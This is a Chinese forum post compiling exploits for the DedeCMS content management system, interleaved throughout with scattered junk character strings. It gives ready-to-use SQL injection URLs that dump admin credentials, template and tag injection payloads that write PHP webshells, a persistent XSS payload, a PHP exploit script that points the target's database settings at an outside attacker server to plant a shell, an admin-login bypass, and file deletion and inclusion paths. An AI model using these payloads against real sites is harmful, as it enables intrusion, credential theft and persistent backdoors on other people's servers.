中国网络渗透测试联盟

标题: dedecms漏洞总结 [打印本页]

作者: admin    时间: 2012-10-18 10:42
标题: dedecms漏洞总结
$ e3 W  U/ q+ p) j! y2 |
Dedecms 5.6 rss注入漏洞
1 a( k& ~9 B$ x/ m; G: V
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
1 s5 J7 q* o; f5 y/ ?( P. S8 |5 J
. C1 b" t8 x0 U) w  z
( P( R5 z, Y% T) H6 O" P/ {
' H4 Y  N/ d6 s8 k* u
$ s& i% ?" H1 P( W4 @& M; H3 S  x9 n7 c& z' Q
+ ~/ f# ~8 }, o6 f/ x
5 q5 m. X2 ~# C" ]  S" W- p4 X1 j
) [0 [* O7 i: y3 F! k& |
DedeCms v5.6 嵌入恶意代码执行漏洞
. }% z7 |4 [" e$ P; x" ?注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}5 h" L' W; G; G) b3 O
发表后查看或修改即可执行+ X: Y/ C# n" c& j$ Z# l: l
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}+ c) j+ x7 N  s" E+ t, E% A
生成x.php 密码xiao,直接生成一句话。# c* d% k8 _) F& T, @
  K/ ^7 J7 X7 P

: V8 M! d7 E+ y8 R
9 I9 I8 c4 l3 w# |. k4 d( r1 A8 }. v2 H. M/ u* _
0 b. K  Z0 Q% J$ w: P3 `

! W/ A. ^' [$ F( D
8 E: ?4 V% o+ h+ H& [( \9 L  o* k2 g* ~' a- q* P# [0 e1 q
Dede 5.6 GBK SQL注入漏洞
0 R1 K  _5 P$ i* B9 z& ~! e
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';1 }) R* v9 F$ ^; Z# F
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe& ^# |5 D8 E1 q, @  p
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7' T, V+ n3 N. V4 V
/ M1 M* g% G& z. `. [, P
# J! p& ^7 Y; n* z
. d. j2 x* ^7 T8 ]" O# K  X

$ d8 g4 a5 G9 C: j: }
( h8 M( f1 c; g6 b/ G. t7 w9 _
: W% T% S( b( R4 l+ `  d* a6 M
0 J7 e. ~" S$ i  P
  V- h3 v( l  k4 y0 {DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞9 [% A2 [/ v# N& T% z; H% x8 l  c
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
1 Q" ^& k- z5 ]) l: _* I6 }2 m3 v9 F: y4 N9 A. l, s! W

. O3 [3 y- I( u- {3 Z8 |1 ^8 a2 C2 w* c
5 ^) D) u$ ~4 i( U4 d. a

( z* E# X+ E7 s, z% h; L6 `/ j. X1 e
DEDECMS 全版本 gotopage变量XSS漏洞$ u- _1 q# Z% y' r- c5 g
1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。
* y/ o, U7 A& \3 N
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
# z1 ^' x+ S2 ]. G5 N1 K* s1 L2 K0 W1 a) }! [8 f
) F* _: {2 a2 G  ~
2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。 . ^; k$ Q. e* o- O6 w" h. N  p
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda( R/ R( G% u2 p. m$ C' {+ y$ r
! c( x) ]* R8 I8 s
8 U* g5 ]6 U4 \- J1 {+ b, J! L7 }' I4 q
http://v57.demo.dedecms.com/dede/login.php
0 r# p" x1 k$ x  c# Q- v& x' g$ P4 y+ [8 Q9 c$ b* Z

9 L1 i" n( t- B/ b- |3 H* Scolor=Red]DeDeCMS(织梦)变量覆盖getshell. m# ?" `) `+ h! {  K3 U9 k1 y
#!usr/bin/php -w
0 \/ f# Y0 q1 m/ Q<?php# ^! n/ e5 i6 B: W1 I, l! S; |- |
error_reporting(E_ERROR);5 l- e9 u: q$ b( ]7 Y/ R: [: R
set_time_limit(0);& z& y7 Z2 X" K8 z& f9 T
print_r('
7 U" t$ b8 S6 q- G! lDEDEcms Variable Coverage
3 G0 x0 a9 ?; m4 C/ y! j- w# h* J5 N. oExploit Author:
www.heixiaozi.comwww.webvul.com
8 C+ Z) u8 }4 t6 l$ x7 F);$ b" b0 v0 W$ n! v" b) m
echo "\r\n";$ O- t' o9 [- T
if($argv[2]==null){
- e3 e4 |" B) S; ]# V) m' M+ Kprint_r('7 b. V0 ]4 e9 R7 p$ m- c; c6 z
+---------------------------------------------------------------------------+
, C# D( J7 b# i9 E0 z. bUsage: php '.$argv[0].' url aid path4 W6 L* ?* W( h7 Y/ f
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/' ~" z  @6 r4 w9 F, |5 E
Example:
0 n  d7 w& G, \1 m; p/ i0 X& {php '.$argv[0].'
www.site.com 1 old
7 Y; N' ~5 _2 l3 ~+---------------------------------------------------------------------------+% ^$ Y' G- F4 p3 X( u
');
" x0 x- R' }8 F) ]- \exit;" i7 `& m5 W$ B" S
}
: k9 O- _3 {4 Y  e4 d# i$url=$argv[1];+ v  t6 J  A9 [8 ]# B: H) C
$aid=$argv[2];0 Y* h+ _- B/ d/ o3 T. N' R
$path=$argv[3];
9 Q; `) ]: N, ?! ^- k$exp=Getshell($url,$aid,$path);
5 @8 l) @0 y6 W. gif (strpos($exp,"OK")>12){
+ _) ?; d7 I4 i: _! g( z0 [echo "
$ k( C% S& o  g5 EExploit Success \n";9 j2 |4 I9 |' P8 `: h- c: a3 q
if($aid==1)echo ": _( L( _- G  {+ T; ?& o9 T" [( A5 G
Shell:".$url."/$path/data/cache/fuck.php\n" ;
5 Q. @6 Y+ t- i, f4 ~- K1 K5 f+ R: O& x0 E) L1 z
# |5 l& B/ t/ `# `
if($aid==2)echo ": S  D3 J! y: c: U2 t! p- p
Shell:".$url."/$path/fuck.php\n" ;
  D: ]4 P8 U! W' C/ @' ]8 `
; k" u) E" w: \) d$ T5 r4 D2 X5 y% H. M$ v2 P# y
if($aid==3)echo "$ ^  [; r! z$ w0 ?
Shell:".$url."/$path/plus/fuck.php\n";4 V' A" l/ P5 c. z

$ o: U0 g; S* y" }" V1 E8 z5 Z% S' I4 ~5 R$ O
}else{) k1 W3 Q9 O$ x6 o& {* l
echo ": l3 @( I9 n" W9 I8 p
Exploit Failed \n";0 B& B' Z1 ^0 u+ Y
}
" Q4 q7 k& _4 J" y7 i1 h- V2 n% t0 Kfunction Getshell($url,$aid,$path){
6 O/ Z/ j3 W) O8 t- q( V$id=$aid;
# V/ m) _. H' e3 J$host=$url;
# r3 b* b- i% e! `9 h- {$port="80";" v  M. Z5 u0 |+ s9 }3 y
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
" z" T6 [3 ]1 D3 A7 w4 h* {! ^$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
+ `% v' E' x. D* _# A3 P$data .= "Host: ".$host."\r\n";
3 v( F( j0 v8 M2 T" c: P( ^$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
- F! E; o: e7 s& ]& U9 U# ~9 h$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
8 \; e; W4 X" t+ \2 P# f% }$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";- f* i9 u# }% |, g% y. ?
//$data .= "Accept-Encoding: gzip,deflate\r\n";1 A: I. ^% f$ p
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
/ g: ]* V! S! Y0 Q  ]$data .= "Connection: keep-alive\r\n";5 u$ x" X6 {" R
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
! H# N: g0 X* H$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
6 I" g" x' A& _5 Y  r8 s$data .= $content."\r\n";$ ^- |1 v/ r) _. {4 w5 o9 s7 j
$ock=fsockopen($host,$port);
! H. a( D9 P" C) r$ }if (!$ock) {$ ~# u2 m! ]1 Y( ?/ }- o) w: [3 a
echo "
$ h. ~5 \, O7 ANo response from ".$host."\n";
/ r# q6 q8 K" v2 |+ Q}; s7 |/ c1 P  `( [; |8 ~
fwrite($ock,$data);
4 R7 Q9 C6 o" u. F9 D, }$ |0 C. gwhile (!feof($ock)) {8 x1 i% z: j( p
$exp=fgets($ock, 1024);2 V3 P* P8 B  H. H" ?9 f3 O% L
return $exp;' V1 a3 S* w* ~/ J
}
# t) i4 n5 q% Z/ a) v. c, n}) S. N+ {; A9 w, C. b, m1 |

* r$ k' _4 N% e& a1 ~# Z) K  b# L# S$ ^/ k  r/ _% _, Y
?>
  n8 F5 Z9 d- u
# R. K3 L+ A; ^; v0 I6 A; e% C( Z' P. \
* w* a1 i7 h, _% _- P0 o7 O' `7 k2 V1 P2 L5 u& W) [0 f

% `* @+ f) W/ x6 o0 Z6 U7 B
5 R# k6 p3 b; B6 ?9 n: U
1 A' `1 }$ n8 N! r6 {
: K( U" L6 V6 ]/ e) x  K% E: x# q, A0 k- r& d

- D$ `0 ^. ]9 E+ W; P+ C' F3 Y# ?& l. C
DedeCms v5.6-5.7 越权访问漏洞(直接进入后台)
- d; O& M! U6 r& B
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
0 _' I( h* R. O' v! r! K% @" {( w* o( ?+ v$ {

7 }, `6 _5 |8 D) H- w! ?# l9 D把上面validate=dcug改为当前的验证码,即可直接进入网站后台
  a8 A" Q( o& {- ^6 l
, F0 i3 {0 ?4 B$ A( c) X' S& W3 Z6 Y$ _
此漏洞的前提是必须得到后台路径才能实现, T  i  o7 K3 r. H3 A0 k  H

7 C9 ~5 u. R, F8 _. R) s. n5 w# {' @" d4 [6 k

; U1 d! E) A5 F) n! d8 p# l6 S% J' }. y3 c+ b5 M, [
3 @! ^) H. ~' t8 `# g

4 B, e) Z, H, Q# k1 _' u6 l
% F8 z5 ^( B& y- _
; y4 M9 a/ ]" ^: B. x4 \: D$ ?
% k% h3 ?) X5 s; j" R4 C) \7 D7 l
; k  Z% ]# {% h8 r( V& MDedecms织梦 标签远程文件写入漏洞3 k! }$ t/ b. q. d- [8 n" ?' d' s
前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');
: H, o' n8 C1 k; B9 j# G1 K7 v4 N! K( @. X3 U
* `8 e/ Z! a+ l, g. |; h$ O
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
( k8 w8 x  d# M3 V7 x# F<form action="" method="post" name="QuickSearch" id="QuickSearch">* q1 Q! \9 r! [# c3 y
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />! d! S4 ?2 C% p, a9 S) y
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
" v- R' w+ V/ `2 e- i9 |  o, J<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />0 j" C, y8 e/ O# j2 e& a% T
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
6 c0 h  [) U- ]  y1 N4 n# P. s( R<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
! d6 ^0 ]  T5 ~/ D6 Z7 d+ G<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
3 P& h; C- o7 h' l3 |6 q- h<input type="text" value="true" name="nocache" style="width:400">+ e& n+ y8 g& S& p3 I, N
<input type="submit" value="提交" name="QuickSearchBtn"><br />1 d7 T1 {- d/ B* {8 C" t; R6 p, e" p$ w
</form># _% ~) }+ _% ]9 I, N6 f" b3 t
<script>
# K. r7 ]% ~$ x9 }1 wfunction addaction(): ^9 _: `( h& d7 X7 i  \+ ?
{9 h# w( _" a8 M5 k2 \
document.QuickSearch.action=document.QuickSearch.doaction.value;0 Y# v9 L3 y6 i/ ]
}+ @2 A& X# N4 t! _0 Y
</script>
- Q- ]% y: _1 U# }  |( c# G  l% h1 D! ]+ ^5 n0 V5 v

( Z4 {0 |0 ]4 {6 G
6 g! O+ Z; J3 D% {3 j+ R# M8 O* h  h" ]- P4 f) |/ ?
0 |( ~; f( o3 L  u& e
$ h% q" a8 s& K

* S. X& U! b0 z/ z3 i8 H, L2 N5 r. D( M: ]* y1 m, z$ \' I1 T

# x9 u( x5 n  Y5 e- _. A& m4 B7 r9 h) @. Z+ _9 y/ Q7 v1 j
DedeCms v5.6 嵌入恶意代码执行漏洞
  ~1 W, G: O: ]) U3 d注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行
! e8 i1 r5 P; r1 T' fa{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
- A5 C/ _, o8 _- Y生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得+ O$ p" C+ b  Y* z3 z. Z
Dedecms <= V5.6 Final模板执行漏洞
$ b$ [( z8 n# _4 N: a' n5 b注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:7 q. J* t5 k5 J# Q; C
uploads/userup/2/12OMX04-15A.jpg+ s2 v4 B" R# ~8 w2 G5 A) K$ b
! J' _$ h; O5 ~( S
0 f- l6 r" F' M( h1 L8 [3 T- a+ f
模板内容是(如果限制图片格式,加gif89a):4 E3 d" p( {0 ?4 ?" I2 `: G
{dede:name runphp='yes'}
( O: u% K) a; W* n7 A. t) @4 \/ C% O$fp = @fopen("1.php", 'a');
! N0 X6 \- d4 |@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
& ~, P( C0 y8 B" g@fclose($fp);
) L3 U# S+ F& u{/dede:name}6 Z0 X+ U1 e% i( {( T
2 修改刚刚发表的文章,查看源文件,构造一个表单:1 g7 M* g1 W. i7 n% |3 m( r
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
: |+ w4 c% C# d) z5 G<input type="hidden" name="dopost" value="save" /># ?1 P! R. c  X3 Z
<input type="hidden" name="aid" value="2" />7 ~1 z& R: q6 P- o. a: x
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
# j# ~7 u2 u4 L/ N) f<input type="hidden" name="channelid" value="1" />' T: h  Q( y6 e6 ~
<input type="hidden" name="oldlitpic" value="" />' B8 q5 h! D/ E9 f+ I! G+ y/ C
<input type="hidden" name="sortrank" value="1275972263" />* y1 f; ?5 [( ]; Q3 Y

$ ^+ L$ T/ h( h2 x7 Z7 T! Q( Q9 S- o$ r
<div id="mainCp">
# }$ @* w" S0 i2 l<h3 class="meTitle"><strong>修改文章</strong></h3>- R) A: ?# t/ j# c6 K! P6 P0 R! K
1 W  z4 o# @7 v$ u
8 |; T% R$ G6 ~, c+ B
<div class="postForm">
6 w( q8 ~6 Z4 C! h0 [# I8 v6 \: m1 Y<label>标题:</label>
/ r, X# t1 I, C0 k' p<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
0 t8 ?: I/ M# w/ k( n, q7 h' _

) p+ H+ @  J: i9 @) N1 K' T5 c<label>标签TAG:</label>
( N0 E! [8 ^) j0 |: e5 S<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
' {: i5 m6 w# d9 ^, A" }) S4 _0 X9 Y# B: i  u
$ r! s' h& K# H- p# z6 Z; w
<label>作者:</label>% F' b3 b6 x" O$ r( t% p) A
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
1 K' p9 q3 ]% s" _/ u0 Q# j. R) k" b

$ D: p& Z6 c" f8 `6 K<label>隶属栏目:</label>
% I% d! [; {2 k. Q1 z8 P<select name='typeid' size='1'>  L; R  V" j# T$ [* o' m% o% {
<option value='1' class='option3' selected=''>测试栏目</option>3 v$ ]' x7 C/ h& ~
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)% @4 C0 ]: m! O( R' D; H, ~: p

" P6 B+ e, l+ W. y, L3 Q( M# n' ~/ j) ?- P% T6 s7 h
<label>我的分类:</label>$ ^7 [( w1 i% n/ B
<select name='mtypesid' size='1'>7 A. q! b! z8 f  O: e) M
<option value='0' selected>请选择分类...</option>
2 B2 V5 P0 W# P$ X" ]<option value='1' class='option3' selected>hahahha</option>* e6 F$ ^4 y( E) d
</select>: u5 W4 @/ U7 f

/ u5 p8 X, U8 \7 O; v8 \$ e2 j) u, ~1 D0 ]( }# N+ a" \
<label>信息摘要:</label>" O& ^8 W/ R" Z9 q: q
<textarea name="description" id="description">1111111</textarea>
5 y" ~4 N" @# @. u# G7 V7 g(内容的简要说明)  r4 G% n8 L2 ?4 _' `9 q' t
3 A# ^$ |9 _! R9 ^

0 g  a- _. t+ B. @$ k5 {8 H<label>缩略图:</label>$ z6 o  s4 h" D( U8 B+ A7 x
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>  T1 l+ ?- f- ?

& H4 a$ M# O# k- g& ~
4 j. X' d5 l# J<input type='text' name='templet'! [$ J( \' v# `( r( r1 [7 B7 \
value="../ uploads/userup/2/12OMX04-15A.jpg">2 Z! T) L# H. F* i4 Z: I' j( l
<input type='text' name='dede_addonfields'
$ n. g, M% E! V9 Yvalue="templet,htmltext;">(这里构造)
) U* U* P1 `+ m. i; O1 _</div>7 c' Q" M) {/ R* U: V. c" C; H' `1 s2 C

- K- M! ]+ a1 R: f+ j* {" [0 y# y( u, [( f9 e5 l) ]
<!-- 表单操作区域 -->! u2 {9 Y, U; }: {+ D
<h3 class="meTitle">详细内容</h3>
. \# J' Z% J1 f3 j9 b5 ~4 C5 @% B9 ^% K6 v$ y6 e9 Z
& |$ N) H$ Q0 ^6 U0 B2 l
<div class="contentShow postForm">- w2 L! l- F' t6 M
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
( A) C+ O5 U. k8 Q, J1 p$ e7 A
, i/ d* y$ I  `
7 r9 R% P- b% M9 N! |& m& {) y<label>验证码:</label>" z% `+ y. C$ H$ z8 A3 d
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />6 t1 P! |- Z1 r2 K/ }! \
<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />7 M; k  G, Z; S. w

5 R' \$ v/ C$ [* R; n
- |, B( p$ {8 a6 O6 n! `, p<button class="button2" type="submit">提交</button>
6 s6 T( ?  q$ P! o# N<button class="button2 ml10" type="reset">重置</button>
; Y3 i; ]+ q3 Z! p9 |</div>
3 L9 S; i, h3 q( n1 P
" T! |# [+ I$ a1 C& ]3 i  W2 x* _; D. m& x8 j( L* l# V
</div>! ~7 [7 Z/ h# ^" O9 x: I- W0 \
5 E+ D/ n3 V+ K; t6 u

1 B3 G& c: k* X9 |$ B$ u% f9 g7 K0 |</form>
0 S' D6 F0 Y" B3 _0 S1 i5 Q. i4 d
: F1 }: \. M3 U3 ^! E" _
提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:
$ j! |5 R' r) S2 t! L0 l8 h9 K假设刚刚修改的文章的aid为2,则我们只需要访问:
2 W$ n- w) E2 S' J. f# M# R
http://127.0.0.1/dede/plus/view.php?aid=2* N/ Q, M9 {- Y" a6 @  E: l
即可以在plus目录下生成webshell:1.php0 ]) t3 Z. g# Q8 R
8 f5 v. s3 d$ C
: @% a  C  c3 h- t( f! @

9 C  s$ A9 a) q, b1 Y' E: s2 v

# I* ?3 f5 N' p, v, J6 g# f3 n& ]; ?6 d) E

3 k3 {/ r3 ]" L) p& q
8 K& i% h! W# c4 P1 o
7 d4 d) m& c; S/ N% W7 g
. S' t* Z+ E/ M& F0 U% E5 b0 U: m2 i; I) M3 s
$ h% g4 V. y) B7 Z6 H2 q! e
DEDECMS网站管理系统Get Shell漏洞(5.3/5.6)1 d  v9 u* E/ j  N6 [8 j8 ~9 l# Y( S  d
Gif89a{dede:field name='toby57' runphp='yes'}
( t; V  W0 H1 D7 c) pphpinfo();
6 z7 K4 q; t4 k% A( z: F{/dede:field}
+ j2 s; Q3 }4 D保存为1.gif; k$ J% G& K8 B: ~" ?
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" ">
4 ?* r. \# ~" C* T3 W<input type="hidden" name="aid" value="7" />
" x2 ?7 |6 R" J5 q<input type="hidden" name="mediatype" value="1" /> ; I4 o+ J0 r5 [: w; F; \9 @
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br> 7 t! m$ l6 ^$ D! S: q
<input type="hidden" name="dopost" value="save" />
, l4 z0 L5 {6 U. W0 z: b<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
. D7 [4 w9 _7 B6 N6 e: O8 ?<input name="addonfile" type="file" id="addonfile"/>
; h+ \7 Y& l: `6 u1 f# f2 B" S& H& O<button class="button2" type="submit" >更改</button> + `  z. W# Q& f7 S  O8 z
</form> - X. [5 Z$ ~; F! u) d7 ]: v) I

! B) c  Q5 m' d& p0 D, D& {- e5 U
" u; h* Q3 W* D  Y) o* L: E构造如上表单,上传后图片保存为/uploads/userup/3/1.gif) u* ~- v; r0 u4 [6 f, K
发表文章,然后构造修改表单如下:& \. H5 Y& B+ g+ ]8 `2 X

4 {* o3 X/ I& Z$ h6 }7 P
, b/ q2 L. q% i& R<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data"> ! w5 h, W! V5 E# G
<input type="hidden" name="dopost" value="save" />
. _  F8 g. ^0 W- w<input type="hidden" name="aid" value="2" />
0 @/ x0 U- _& T<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
  I9 H+ G6 w$ }% k" k* Q6 ]) {<input type="hidden" name="channelid" value="1" /> : ^$ x" Y, ]/ m0 t, Q. Z
<input type="hidden" name="oldlitpic" value="" /> ) G  f7 S, i" Q0 f# ]' W) I3 k9 z
<input type="hidden" name="sortrank" value="1282049150" /> ( B$ j# r. b! H: e. [% O
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
* C# {( g$ ~& m& y2 n/ f<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
  p9 p6 @% h, E3 p) o; P6 Y  A<select name='typeid' size='1'> ( p: b2 J! \4 R: F0 d* {
<option value='1' class='option3' selected=''>Test</option> 2 e, @3 M$ ^2 _; K% a
<select name='mtypesid' size='1'>
' f' K2 W/ R" D1 A<option value='0' selected>请选择分类...</option>
5 k) @; T4 x0 S: P<option value='1' class='option3' selected>aa</option></select> ) \% B' C- [  ~* h
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea> * V* c$ L7 `/ m; D, O6 r/ B
<input type='hidden' name='dede_addonfields' value="templet">
$ {% C( y/ h5 ~<input type='hidden' name='templet' value="../uploads/userup/3/1.gif"> 9 G! j$ v* _* y2 m0 z
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" /> / N% J) N! \; Q; {; t7 B* A: C( G
<button class="button2" type="submit">提交</button> + l9 A2 J- V0 t- D; g
</form>" h  E; n; b" W% A; N

! g2 }! F- L5 `3 ^$ o$ _) I% p' X% D! `4 R* Q+ e' Y* c! _( B

% ^  ~( k; R, P, c* l( J( p, ?1 t) i! E7 [2 s2 t) m
' d3 X7 T; \7 x# d: m! e, l  W
7 x$ [8 ]' D: q

, r7 y1 e7 b) n6 l, _
) M3 U/ c( W" ?! R- Q
) F& d! i: A% l+ y. l) @3 Y; U; B, U) O

" E/ b! d* a( ?+ y7 G$ `3 O# ~# D/ L( ~, V/ C* V6 X) |# S
织梦(Dedecms)V5.6 远程文件删除漏洞
; D4 u, N) a: O5 m5 R
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif4 e" |: r3 U7 I! C- M
% v4 I% a: I, b0 @1 L

3 {7 G0 N. v  y  V
" G! x0 D8 s, e4 m* c' d5 x" F5 X$ q2 q: j# g; Y

+ V& ?% `* I: \. z: S
) I$ r! l: z& o; P, z" p' R
8 ]) S' x8 H7 L0 M4 G# C
+ J) k5 E4 `6 s% R& R$ u$ ]- ]. Q% J

: [  {) \( ^1 b/ J$ C4 }织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞 7 w8 }4 R( L8 d; _5 T7 g
http://www.test.com/plus/carbuya ... urn&code=../../
8 h, `& V5 a) F/ j& k& S* O* I+ K% [, g

  U: N; @) E4 x* [# {+ u: I# w1 w% \0 B2 x2 e1 O
6 h! f. D+ p4 V: ^
: M/ O+ ], W/ L9 x
5 w9 F6 j8 u) d- z  L) R
/ I  Y$ h( m% d: e7 u
5 _1 E3 M0 `) u* b5 [) ]

( I) z* J% v+ \. V
6 V$ k: E6 y/ ]DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞 " x% B* k" A5 q& S2 r
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`0 R# ~. V% D* i( \2 }7 R
密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5& m4 `% s& b3 N+ Z$ W0 b
$ x7 T6 a6 {! T; L/ _4 Y) t+ s0 e
! z# ?+ j: i. Q, c" L# q

6 z% {( L3 Z% e4 C' m. U% q  d
' x* ~' K% Q/ F/ I9 s& I# s
! {7 ^+ \1 F3 p$ t5 n, I' h# I" k1 D+ `2 ~6 y
: m& F: p+ |8 U& P( D
; C& g  H1 z2 L; V/ a  G$ A
2 |" R  L# o" j. S
9 ~: m9 \/ y4 k1 W4 K
织梦(Dedecms) 5.1 feedback_js.php 注入漏洞  g5 B! f  Q" r5 h
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
9 q5 @9 Q+ f: [. n/ x8 `/ Z* c8 \, h0 f" X/ i/ E

$ m5 ^  O' @1 T, @
